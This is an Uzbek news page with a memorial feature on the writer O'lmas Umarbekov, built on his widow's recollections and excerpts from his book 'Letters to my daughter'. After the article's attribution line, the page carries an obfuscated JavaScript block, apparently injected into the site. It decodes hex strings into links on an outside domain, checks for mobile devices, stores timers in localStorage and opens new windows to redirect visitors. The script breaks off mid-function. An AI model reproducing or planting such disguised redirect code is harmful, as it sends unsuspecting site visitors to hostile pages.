Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

Oʻlmas Umarbekov…

Oʻlmas Umarbekov: «Hamma davrda halol mehnat, poklik, odamiylik qadrlangan». Oʻlmas Umarbekov haqida davralarda soʻz ketganida, odamlar uni faqat yaxshi, juda yaxshi, ajoyib inson sifatida eslaydilar. Holbuki, u ham hamma…

Oʻlmas Umarbekov:

«Hamma davrda halol mehnat, poklik,
odamiylik qadrlangan».

Oʻlmas Umarbekov haqida davralarda soʻz ketganida, odamlar uni faqat yaxshi, juda yaxshi, ajoyib inson sifatida eslaydilar.
Holbuki, u ham hamma qatori hayotning achchiq-chuchugini keragidan koʻp tortgan, xiyonatni, shafqatsizlikni, munofiqlikni ham koʻrgan, ammo bu illatlar qarshisida ojiz qolmagan, yaxshilikka ishongan, haqiqatga suyangan inson edi.
Oʻlmas Umarbekov oilada ham ajoyib turmush oʻrtogʻi, mehribon ota edi. U umrining soʻnggi lahzalarigacha vafodor rafiqasi – ajoyib ayol Zuhra Umarbekovaga boʻlgan cheksiz muhabbat, sevikli farzandi Umidaga beqiyos mehrini yuragining eng aziz qatlamlarida asrab oʻtdi.
Oʻlmas Umarbekov bilan birga salkam 40 yil davomida eng ogʻir damlarda ham birga boʻlgan, taqdiridagi juda katta yoʻqotishga hamon ishonmaydigan, shunga qaramay, iroda, bardosh va yorugʻ xotiralar bilan yashayotgan bu ayol bilan suhbatlashganimizda, ikki inson oʻrtasidagi samimiy tuygʻularga qurilgan ajoyib munosabatlarning, juda ulkan muhabbat mujassamiga duch keldik.
Shuningdek, sizning eʼtiboringizga adibning «Qizimga maktublar» kitobidan ham lavhalar havola qilishni lozim topdik.
Bu mushohadalar sizga insonga faqat bir marta beriladigan hayotning qadriga yetish, uning har bir kunini, har bir lahzasini aziz qilishga oʻrgatsa, shoyad.

2004 yilning yozida ustozimiz professor Ozod Sharafiddinov bilan Oʻlmas Umarbekov haqida suhbatlashgan edik. Oʻshanda Ozod aka shunday degandilar:
«Rumiydan soʻrashibdi: «Ustoz, sizning qabringizni qayerdan izlaylik?». Ustoz aytibdilar: «Meni izlamoqchi boʻlsangiz, muxlislarning yuragidan izlangiz».
Oʻlmas Umarbekov garchi olamdan oʻtib ketgan boʻlsa-da, u ham muxlislar yuragida qoldi. Toʻgʻri u bilan har kuni gaplashgan, uning ijodini ipidan-ignasigacha oʻrgangan, u haqida juda koʻp yozgan emasman, lekin uning juda yaxshi inson, yaxshi yozuvchiligini yaxshi bilardim.
Anton Pavlovich Chexovning bir gapi bor: «Odamda hamma narsa goʻzal boʻlishi kerak: yuzi ham, koʻzi ham, qalbi ham, yurish-turishi ham». Oʻlmasda hamma narsa goʻzal edi. Bu gapni Chexov Oʻlmasni koʻrib yozmaganmikin, Chexov Oʻlmas Umarbekovni koʻrganidan keyingina shunday fikrga kelgan, deb oʻylardim».
Oʻlmas Umarbekov chindanam taʼrifga loyiq darajada goʻzal, aqli raso inson edi. Buning oʻziga xos sabablari ham bor. U odamlarga bor-yoʻgʻini ulasha oladigan mard, xokisor otaning uzoq kutilgan farzandi edi. Shundanmi, ogʻir, vazmin, urush dahshatlarini front ortida goʻdakligidayoq his qilib ulgurgan bu yigit Zuhra ismli qiz bilan tanishganida uning tarjimai holini eshitib oʻzini ortga tortmadi, u bilan oʻz taqdirini bogʻlashdan qoʻrqmadi. Onasidan uch yoshida, urushga ketgan otasidan sakkiz yoshida ajralib, bolalar uyida voyaga yetgan qiz uning koʻzlariga dunyodagi eng olijanob, eng yaxshi qiz boʻlib koʻrindi.
Ular avvaliga kutubxonada uchrashib qolardilar. Kuz kelib, talabalar paxta terimiga otlanganlarida, Oʻlmas Umarbekovni brigadir boʻlib tayinlashar, u paxta dalalarini otda aylanib yurar, qizlarning paxta toʻla etagini xirmongacha olib borishga yordamlashardi. U yaqinlashishi bilan hamma qizlar hayajonlana boshlashar, nazarlarida bu goʻzal yigit ularning oldiga atay gaplashgani kelayotgandek tuyulardi. Lekin bu yigit Zuhraxonning oldiga kelar, oʻzini olib qochayotgan nozik-navnihol qizdan «Mening yordamim sizga kerak emasmi?» deb sekingina iymanib soʻrardi.
Qizlar bu holni bir-ikki kuzatganlaridan soʻng tushundilarki, gap boshqa yoqda ekan. Shuning uchun darrov Zuhraga imlashar, «Zuhra, Zuhra, Umarbekov yana sen tomon kelyapti» deb pichirlashishardi.
Sovuq qish kunlaridan birida universitetda shaxmat oʻyini boʻlib oʻtdi. Musobaqada ikkinchi kurs talabasi Zuhra ham ishtirok etgandi. Oʻsha paytda Oʻrta Osiyo Davlat Universiteti Karl Marks koʻchasida joylashgandi. Oʻyin tugaganida ancha qorongʻu tushib qolgani uchun Oʻlmas Zuhrani uyigacha kuzatib qoʻymoqchi boʻldi. Lekin «Mening uyim yaqin. Hech ovora boʻlmang. Men yotoqxonada turaman» degan javobni oldi u koʻzlarini yerdan uzmay zoʻrgʻa gapirayotgan qizdan. «Siz boshqa shahardan kelganmisiz?» deb soʻradi yigit uning javobidan soʻng. Shunda Zuhra unga oʻz hayotini, ota-onadan yetim qolgani, bolalar uyida katta boʻlgani, hozir yotoqxonada istiqomat qilishini aytib berdi. Shu kundan boshlab yigit qizni yotoqxonagacha kuzatib qoʻyadigan boʻldi.
«Bir kuni qattiq sovuq edi. Laylak qor yoqardi. Yotoqxonaga yaqinlashib qolganimizda, «Palʼtongizning yoqasini koʻtarib oling» dedilar va qoʻllari bilan yoqamga ishora qildilar. Qizlar derazadan qarab turishgan ekan, «Oʻ, Umarbekov Zuhrani sevib qolgani rost shekilli» deb rosa gapirishgan. Yoʻq, bu qandaydir gʻiybat emasdi, hasad ham emasdi, dugonalarim menga chin koʻngildan havas qilishardi. Chunki, Oʻlmas aka universitetda eng chiroyli yigitlardan biri edilar. Qolaversa fakultet komsomol tashkilotining sekretari edilar» , – deb eslaydilar Zuhra opa.

  • Bir kuni Navoiy teatriga bilet olib kelganlar. Men bormadim. Biletlarni koʻz oldimda yirtib tashladilar. «Agar siz bormasangiz, men ham bormayman», – dedilar chin koʻngildan xafa boʻlib.
    Keyingi gal yana bilet olib kelganlarida «Qoʻrqmang, faqat siz emas, fakultetdagilarning hammalari boryaptilar», – dedilar.
    Bularning mehribonliklarini koʻrib, shodligim ichimga sigʻmasdi».
    «Qizimga maktublar» asaridan «Umida, men senga aytsam, opang bilan topishganimizdan buyon, yelkamdan turmush tashvishlari agʻdarildi-qoʻydi. Kel, endi senga opang bilan qanday tanishganimizni aytib bera qolay. Opang bilan fakultet kutubxonasida tanishganmiz. Oʻshanda men uchinchi kursda oʻqirdim.
    Men kechqurun oʻqishdan keyin kutubxonada qolib, ocherkmi, hikoyami yozishga harakat qilardim.
    Men oʻshanda kichkina, nimjon, sochini bitta qilib oʻrib, orqasiga tashlab olgan qizni koʻp koʻradigan boʻlib qoldim. Oʻzimdan-oʻzim uni kuzatadigan boʻlib qoldim, kelmasa xavotir oladigan boʻlib qoldim. Universitetning orqasida yotoqxonada turar ekan. Ismi Zuhra ekan».

Ular uchrashib turdilar. Zuhraxonni lagerga vojatiy boʻlib yuborganlarida ham, Oʻlmas uni tez-tez koʻrgani borib turardi. «Oʻsha paytda kambagʻalchilikdanmi, kino, teatrga pul yoʻq ekanmi, koʻproq koʻcha aylanardik, – deb xotirlaydilar xiyol jilmayib Zuhra opa. – Bir kuni uchrashuvga dugonalarim yuzimga upa surib chiqarib yuborishdi. «Axir u nihoyatda goʻzal yigit. Bunaqa chiqsang, uyat boʻladi-ku» deyishdi. Oʻlmas aka esa, «Voy, nega yuzingizga un surib chiqdingiz?», – degandilar.
Bir kuni «Oʻzingiz bilan pasportingizni oling», – dedilar. Men «xoʻb» dedimu, lekin tushunmadim. Bir vaqt qarasam, ZAGSga olib bordilar. U yerdagi ayol «Bizda bir oylik sinov muddati bor. Bir oydan keyin kelasizlar», dedi bizlarga. « Bir oy deysizmi? Voy-boʻ, buncha koʻp. Bir oygacha oʻlib qolaman-ku» deganlarida rosa kulganman.
Dabdabasiz ZAGSdan oʻtganmiz».

«Qizimga maktublar» asaridan. «Bir kun kelib, opangga albatta uylanishim kerakligi, faqat opang bilan turmush qurishim mumkinligi ravshan boʻlib qoldi. Toʻyimiz 1956 yilning 30 sentyabrida eski hovlimizda boʻldi».
Toʻy Oʻlmas akaning hozirgi «Rossiya» mehmonxonasi, Mirobod bozori oldidagi hovlilarida boʻlib oʻtdi. Kelinning boshiga oq roʻmol yopdilar, kuyov oʻzining kundalik kostyum-shimida edi. Hech kimni kelinning seplari bor-yoʻqligi qiziqtirgan ham emas. Oradan oʻtgan yillar davomida ham bu masala hech qachon oila aʼzolari tomonidan muhokama ham qilingan emas. Bu ham Oʻlmas akaning qanday bagʻri keng, oqibatli odamlar orasida voyaga yetganini koʻrsatadi.
«Birinchi asarlariga katta mukofot ham olganlar. Otalari juda xursand boʻlganlar. Bilasizmi, agar odam bir-birini yaxshi koʻrsa, pulning ahamiyati boʻlmaydi. Shu uyni ham bittadan taxta olib kelib qurganmiz. Ertalab turib, Tezikovka bozoriga chiqib qurilish mollarini sotib olardik», – deb xotirlaydilar Zuhra opa.
Oʻlmas akaga otasidan qolgan bu hovliga yosh er-xotinlar koʻchib kelganlarida 1959 yil edi. Uni oʻz kuchlari bilan juda koʻp yillar davomida tikladilar. Faqat halol topilgan mablagʻlarga tikladilar.
Oʻlmas Umarbekov vafot qilganlarida maʼrakalarda ishtirok etganlar orasida oddiy, xashamu bezakdan holi hovli, uy-joyni koʻrib xayron boʻlganlar ham, hayratdan yoqa ushlaganlar, «Oʻlmas Umarbekov ministr boʻlgandi, Bosh Vazir oʻrinbosari boʻlgandi, uylarini qasr qilib yuborishi ham mumkin edi-ku. Nahotki shunaqa hovlida turgan boʻlsa» deb gapirganlar ham boʻldi.
«Kiyim-kechakka ham ahamiyat bermasdik. Ikkita koʻylagim boʻlishidan uyalardim. Hozir shu yoshimda oʻylayman, boylikka berilishdan kelib chiqmaydimi aslida dunyodagi barcha fojealar.
Pul odamni baxtli qilolmaydi. Pul deb hamma narsadan voz kechish mumkin emas», – deb hisoblaydilar Zuhra opa.
«Zuhra opa, aytingchi, Oʻlmas Umarbekov hayotda baxtli edilarmi?» – deb soʻrayman.
Zuhra opa boshlarini bir oz yerga egadilar, nimanidir xotirlagandek, jimgina soʻzlaydilar: «Juda baxtli paytlari ham boʻlgan. Lekin har doim baxtli boʻlganlar deb ayta olmayman. Sovet yozuvchisi boʻlish qiyin edi. Sovet yozuvchilarining asarlaridan konfliktsizlik talab qilinardi. Hayot esa, hayotda esa hamma narsa taomila boshqacha edi, axir hayot boʻlganidan keyin muammo ham boʻlishi tabiiy-ku. «Hamma narsa inson uchun» deyilardiyu, lekin aslida unday emasdi.
«Odam boʻlish qiyin» asarlarini yozganlarida, garchi mukofot olganlariga qaramay, bir necha bor matbuotda uni yomonlab, tanqid qilib chiqishdi. «Nega qahramon oʻladi? Axir sovet yoshlari baxtiyor yoshlar-ku» degan gaplar rosa koʻp boʻlgan.
Ayniqsa, Markazqoʻmda ishlagan paytlari juda qiynalardilar. Odamlarga yordam bera olmaganlaridan qiynalar edilar.
«Bugun ham qancha odam yordam soʻrab oldimga kirdi. Odamlarga yordam berish kerak. Lekin qoʻlimdan kelmaydi», – derdilar».
Holbuki, bu lavozimlarda oʻtirgan juda koʻplab odamlar qatori u ham yurtdoshlarining muammolari, tashvishlariga barmoq orasidan qarashi, barcha muammolari amal kursisi tufayli xamirdan qil suqurgandek oson hal boʻlgan baʼzi sobiq Shoʻro amaldorlari kabi odamlarni qizil gilamlar solingan xonalardan quvib chiqarishi mumkin edi. Lekin bunday yashashga uning vijdoni yoʻl qoʻymasdi. U – yozuvchi edi, vijdonli inson edi. Shuning uchun ham uning hayotidan ham, yozgan asarlaridan ham «Vijdon» degan soʻz qizil ip boʻlib oʻtgandi.
Toʻgʻri, mezonlar oʻzgarar, hayot oʻzgararkan, lekin xalqning anʼanalar, azaliy qadriyatlarga boʻlgan munosabatlari oʻsha-oʻsha boʻlib qolaverarkan. Xalqimizning vijdon masalasi, vijdonli odamlarga boʻlgan hurmati muhabbati ham oʻsha-oʻsha boʻlib qolaverdi. Bugun oʻylab qarasang, bizga Oʻlmas Umarbekovning kuchli, halol, vijdonli qahramonlari yetishmayotgan ekan. qani edi, bu gaplarni yozuvchining oʻzi bilan oʻrtoqlashish, uning oʻziga aytishning iloji boʻlganida. Afsus. . . Oʻlmas Umarbekov oramizdan ketgan kundan bizni 12 yil ajratib turibdi.
«Oilada baxtli boʻlganlar desam, oʻzimni maqtab yuborgan boʻlaman, – deb davom etadilar Zuhra opa, – 1972 yil uzoq kutilgan farzandimiz oʻgʻlimiz tugʻildi-yu, olamdan oʻtdi.
Dadam, oyim hayotdan koʻz yumishdi. Oʻzlari ogʻir kasallikka uchradilar, qattiq qiynalganlar, lekin kuchli, irodali odam edilar, hech nimadan nolimasdilar, hamma narsadan yaxshilik topa olardilar».
1990 yil Oʻlmas Umarbekov Oʻzbekiston Respublikasi Vazirlar mahkamasi Raisining Birinchi Oʻrinbosari vazifasini bajarayotgan yillar ogʻir kasallikka uchradi va oʻz arizasiga koʻra isteʼfoga chiqdi. U gapirolmay qolgandi. Mashhur quloq, tomoq va burun kasalliklari professoriga murojaat qildilar. «Tomogʻingiz shamollagan, naʼmatak yoqiga chayib turing» degan maslahatni olishdi. Lekin dard kundan-kunga zoʻrayib borardi. Moskvaga yetib borganlarida, afsus, hammasi kech boʻlgan, dard tanaga oʻz hukmini oʻtkazib boʻlgandi.
Oʻsha umidsiz kunlar tashqi dunyo bilan Oʻlmas Umarbekovni bogʻlab turadigan narsalar yana uning bir umrlik hamroxi – daftar va qalam boʻlib qoldi. Oʻshanda u ikkita daftar tutgan – ulardan birinchisi shifokorlar, ikkinchisi Zuhra opa bilan boʻladigan suhbatlar uchun edi. Buning boisini Zuhra opa endi tushunyaptilar. Oʻlmas aka xastalik azobini, tushkunlik uchqunini turmush oʻrtoqlariga sezdirgilari kelmagan ekan.
Albatta Zuhra opa uchun bu haqda gapirish juda, juda ham qiyin, buni tushunish qiyin emas:
«Hozirgi ijodkor yoshlar orasida «Umarbekovning tabassumi» degan gap yuradi.
ToshMIda yotibdilar. Oʻzlari nihoyatda ogʻir betoblar, lablarida esa tabassum, menga «Zuhraxon, mana siz juda koʻp kitoblarni oʻqigansiz. Narigi dunyo haqida nimalar deya olasiz?», – deydilar. Oʻshanda darrov tushunardim, ular oʻlim haqida gapirardilar, yozuvchi odamga bular haqida gapirish albatta juda qiyin. Koʻnglim choʻkib ketardi. Men «Oʻlmas aka, hamshira hozirgina mana bu dorilarni tashlab ketdi, buni hozir, bunisini esa birozdan soʻng ichishingiz kerak ekan» , – deb ularni chalgʻitmoqchi boʻlaman. Ular esa, «Yoʻq, siz menga ayting, odamning ruhi oʻlmaydi, deyishadi, shu rostmi?» deb meni savolga tutardilar.
«Oʻlmas aka, toʻgʻri aytdingiz, odamning ruhi oʻlmaydi» deyman jimgina. Bir kuni «U dunyoda men sizni qanday topaman?» deb keyin jim boʻlib qoldilar. «Zuhraxon, u yoqda ham men siz bilan boʻlgim keladi. Oʻsha yerda ham siz menga qarashingizni istayman. Oʻzi uchratarmikinman sizni?» deb oʻzlariga-oʻzlari savol berdilar».
Bugun Zuhra opa hali hanuz ishdan qaytganlarida, xonada Oʻlmas aka ularni kutib oʻtirgandek tasavvur, hamon dunyodagi eng yaxshi dori-darmonni sotib olish, dunyoning eng yaxshi shifokorlaridan muolajalar olish orzusi bilan yashaydilar.
Qanchalik buyuk muhabbat va sadoqat! Hatto hayratga tushasan.
«Kasalxonadamiz. Bosiq ovoz bilan «Mendan keyin qanday yashaysiz?» deb iztirobga tushardilar. «Siz menga ayting, mendan keyin siz qanday yashaysiz?» derdilar. «Oʻlmas aka, siz ketsangiz men ham ketaman. Sizsiz menga hayotning qiziqi yoʻq», – derdim. «Yoʻq-yoʻq, bunaqa demang. qizimiz hali yosh, uni oyoqqa turgʻazishingiz kerak. Siz Umidani katta qilishingiz kerak. Qanchadan-qancha qoʻlyozmalar bor. Ularni kitob qilib chiqarishingiz kerak. Mayli, koʻp yashang, yaxshi yashang, umringiz uzoq boʻlsin. Keyin bir kun borarsiz. Oʻsha yerda albatta uchrashamiz» derdilar.
Men bugun shu fikrlar bilan yashayapman».
«Qizimga maktublar» asaridan: «Peshonamga shu yoshimda hayotdan koʻz yumish yozilgan boʻlsa, mayli shu daqiqani kutib olaman. Faqat Umida mensiz eziladi. Oʻn toʻrt yoshda otasiz qolishi, oʻrtoqlari oldida. . . qiynaladi. Bilaman, Zuhraga ham ogʻir boʻladi. Lekin u irodali, aqlli ayol. Qizining yetim qolganini hech kimga sezdirmaydi.
Umida! Jonim qizim! Yaxshiyam xudo bizga seni berdi. Opang kabi men uchun ham eng aziz, eng qimmatli, eng shirin va shakar odamsan. Sening baxtli boʻlishingni qanchalik istashimni bilsang edi! Omon boʻl, qizim. Barcha orzularingga yet. Arzandam, yolgʻizim, agar baʼzida seni urishgan boʻlsam, kechir. Faqat yaxshi niyatda shunday qilganman. Seni yaxshi koʻrishimni, hech kimga ishonmasligimni yaxshi bilasan.
Qizim, agar taqdir taqozosi bilan endi koʻrishmay qolsak, opangni ehtiyot qil. Uni hurmat qil, yolgʻizlatib qoʻyma. Qattiq gapirma, yaxshi gapingni ayama. Qizim, hayotingga gard yuqmasin. Baxtli boʻl!.. Ey xudo! Oʻn sakkiz ming olamni yaratgan oʻzingsan. Har narsaga qodirsan, har narsaga qudrating yetadi. Men bir gunohkor bandangni kechir. Hali suyagi qotmagan, mustaqil hayot qurishga ojiz qizimning baxtiga menga shifo ber, uni oyoqqa turganini koʻray, keyin jonimni olsang, roziman».
Oʻlmas Umarbekov juda koʻp insonlar tasavvurida juda yaxshi inson sifatida qololdi. Holbuki, u juda katta lavozimlarda ishlagandi. Oʻz manfaatlarini birinchi oʻringa qoʻysa ham unga hech kim eʼtiroz bildirmasligi mumkin edi. Lekin u bunday qilolmagan, qilishni istamagandi. Odamlar, xalq oldidagi burch ularga nisbatan hamisha va har doim yaxshilik qilishdek masʼuliyatli vazifani yuklagan. Bu esa hamma zamonlar uchun ham nihoyatda noyob fazilatdir.
«Bir yili kimdir ularga qimmatbaho moʻynadan qilingan telpak olib kelib beradigan boʻlibdi, oldindan pulini beribdilar. Koʻp oʻtmay ishdan telpak bilan xursand qaytib keldilar. Oʻshanda ular Madaniyat vaziri boʻlib ishlardilar. Men paketga oʻralgan telpakni olayotgandim, birdan yerga «tap» etib bir narsa tushdi. Qarasam, qogʻozga oʻralgan pul. Juda koʻp pul.
Ikkalamiz bir-birimizga qarab qoldik. «Qani, menga olib bering-chi», – dedilar. Rostdanam pachka-pachka pul edi. «Voy, yaramas, menga pul beribdi-ya. Bilasizmi, menga pora bermoqchi boʻlibdi-ya yaramas, – dedilar. Men endi tushunmay qarab turibman. «Toʻxtang, toʻxtang, buni albatta xotiningizga olib boring. Juda xursand boʻladi», degandi. «Siz oʻsha odamni taniysizmi? », dedilar. «Yoʻq», – dedim. «Nega unday dedi. Yoʻq, siz aldayapsiz, siz uni yaxshi taniysiz. . . qani, darrov oʻrang-chi» deb buyurdilar. Tishlari tishlariga tegib, qaltirab gapiryaptilar. Kechasi bilan ikkimiz ham mijja qoqmadik. Ertasiga ishga ketdilar.
Men kechgacha aftadohol yurdim. Ishdan kelishlarini kutib oʻtirdim. Bir vaqt keldilar. Koridorda uzoq turib «kelmadi» dedilar afsus bilan. Oʻlmas aka chaqirganlarini eshitib haligi odam kasalxonaga yotib olibdi. Faqat bir haftadan keyin oʻsha odam oldilariga kelibdi. Oʻlmas aka paketni ochib «Bu nima?» debdilar. «Siz menga pora berdingiz, hozir kerakli odamlarni chaqiraman. Sizni pora berganlikda sud qilishadi» debdilar.
«Oʻlmas aka, kechiring» deb tiz choʻkib yerga oʻtirib olibdi u. «Shu kungacha faqat shunaqa qilardik. Meni shayton yoʻldan ozdirdi. Oʻlmas aka, kechiring meni. Oʻzi aytishuvdi «Umarbekov pora olmaydi deb». Meni kechiring» deb yigʻlabdi.
Oʻshanda juda ham qattiq xafa boʻlgandilar», – deb gapirib beradilar Zuhra opa.
Baʼzida odamlarning ogʻzilaridan «bu odamlar nimani bilishardi» degan alamli soʻzlarni eshitib qolamiz. Oʻzlarining mehnatlari eʼzozlanmagani uchun atrofdagilarni aybdordek hisoblaydigan bu toifa odamlarning oʻylashlaricha, atrofimizdagilarning qalb koʻzi, vijdoni yumiq.
Yoʻq, aslo bunday emas.
Negaki, xalq juda dono, juda oqildir va u hamma narsani biladi, odamlar kimning kimligini yaxshi bilishadi. Bu bagʻri keng, bir oz soddaroq xalq Oʻlmas Umarbekovning ham kimligini yaxshi bilardi. Uning «Qizimga maktublar» asarini oʻqigan odam ayniqsa buni yaxshi his qiladi. Bu asar odatiy kitoblardan biri emas. Uni yozuvchi oyning yorugʻida, bamaylixotir oʻtirib, uzoq yillar oʻylaganini qogʻozga tushirgan emas. Odam qachon vafot etishini bilsa, yashash dahshatga aylanadi deyishadi. Oʻlmas aka bu asarni oʻz oʻlimlarini bilib yozganlar. Lekin oʻlimdan qoʻrqmaganlar. To soʻnggi nafaslari chiqquncha qalamga sodiq boʻlganlar.
Oʻlmas akaga «Qizimga maktublar» asarini yozishni Zuhra opa maslahat bergan ekanlar. «Moskvada edik. Biz yotgan palatada unchalik sharoit ham yaxshi emasdi. Ayniqsa oʻsha yili havo ancha past kelib, har kuni yo yomgʻir, yo qor yogʻardi. Derazadan tashqariga qarab ezilardilar. Shunda men «Oʻlmas aka, bir kitob yozsangiz, qanday boʻlarkin. Unda oʻzimiz, ota-onangiz haqida yozardingiz» deb maslahat berdim. Juda xursand boʻlib ketdilar. Koridorda eski bir tumbochka bor ekan. Shuning singan eshigini olib keldilar va tizzalariga qoʻyib yoza boshladilar. Nazarimda, ancha yengil tortgan edilar».
«Qizimga maktublar» asaridan «Taxminan bir oy, bir yarim oydan soʻng uyga qaytishim mumkin. Qizim, seni koʻraman. Ukalarim, doʻstu birodarlarimni koʻraman. Umida, seni juda sogʻindim. Deyarli har kecha qoʻngʻiroqdek ovozingni eshitgandek boʻlaman. Koʻz oldimda oʻzing paydo boʻlib, koʻzlaring yonib, «Ada, keldim» deysan-da, yonimga kelib, yuzimdan oʻpgandek boʻlasan. Koʻp emas, atigi ikki haftadan beri Moskvada boʻlsam ham, har kuni seni oʻqishdan qaytayotgan payting, oʻz kaliting bilan darvoza-eshikni ochishing, shaxdam qadamlar bilan taq-tuq qilib ayvonga koʻtarilishing koʻz oldimdan oʻtadi. Qizim, jonim qizim, seni yana koʻradigan boʻldim. Orzuim eson-omon uyga qaytmoq edi, niyatimga yetadiganga oʻxshayman. Xudo xohlasa, marhamat qilsa, bir oy, bir yarim oylardan soʻng tuzalib qaytaman».
Oʻlmas Umarbekov ham dunyodagi barcha otalar singari farzandining kelajagini koʻrgisi kelardi. Unga qizi Umidaning maktabni Oltin medal, Milliy universitet iqtisod fakultetini muvaffaqiyatli, soʻng «Umid» jamgʻarmasining imtihonlarida muvaffaqiyatli qatnashib, Manchesterdagi universitetni moliyachi ixtisosligi boʻyicha yakunlaganini koʻrish nasib etmagan ekan.
Ota qizini xuddi ana shunday zamonaviy, oʻqimishli, intiluvchan, haqiqiy maʼnodagi ziyoli boʻlishini xohlagandi. Bugun Umida London universitetining magistraturasida tahsil olish barobarida jahonga mashhur «Jeypi Morgan and Manxetten Cheys» kompaniyasida tahlilchi lavozimida faoliyat yuritmoqda. U oʻtgan yili bahor oyida turmush qurdi. Xayotning qiziqligini qarang-ki, Londonda ikki oʻzbek – biri – toshkentlik qiz, ikkinchisi oʻshlik yigit – Umida va Elbek bir-birlari bilan uchrashib, bir-birlariga koʻngil qoʻyib turmush qurdilar.
«Qizimga maktublar» asaridan «Nazarimda Moskvada meni davolay boshlaganlaridan beri anchagina dilim tinchib, qoʻlimga qalam oladigan holatga kelganimdan beri senga atab yozmoqchi boʻlganlarim nihoyasiga yetib qoldi. Hozircha kifoya. Xudo xohlasa, uyga qaytsam, esimga tushadigan voqealarni yozib berarman. Xatlarimning soʻnggida ustoz Abdulla Qaxxorga oʻxshab senga, qizim, beradigan ikki maslahatim bor. Birinchisi:

  • Bu dunyoda opangchalik senga mehribon, yaqin, aziz, sendan jonini ham
    ayamaydigan odam yoʻq. Birga boʻl. Yolgʻizlatib qoʻyma. Asra.
    Ikkinchi maslahatim:
  • Davr oʻzgarib ketdi, qadriyatlar oʻzgardi. Lekin hamma davrda halol
    mehnat, poklik, odamiylik qadrlangan. Shu yodingda boʻlsin.
    Yolgʻizim, suyukligim, xayr, omon boʻl, baxtli boʻl».

Oʻsha kuni 1994 yilning oʻninchi noyabri oqshomgacha yomgʻir quygan edi. Soat ikki yarimda Eski Tosh MI kasalxonasida Oʻlmas Umarbekov hayotdan koʻz yumdi.
Uni yerga qoʻyganlarida yomgʻir sharros urib yigʻladi. Yaxshi odam boʻlishning quvonchu mashaqqatlarini barobar tortgan bu insonni soʻnggi yoʻlga kuzatishda hatto tabiat ham faryod chekdi.
Rafiqasi uyga kelishi bilan katta soat millarini toʻxtatib qoʻydi.

Taniqli telejurnalist Elmira Rahmatullayevaning feysbukdagi sahifasidan olindi.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const 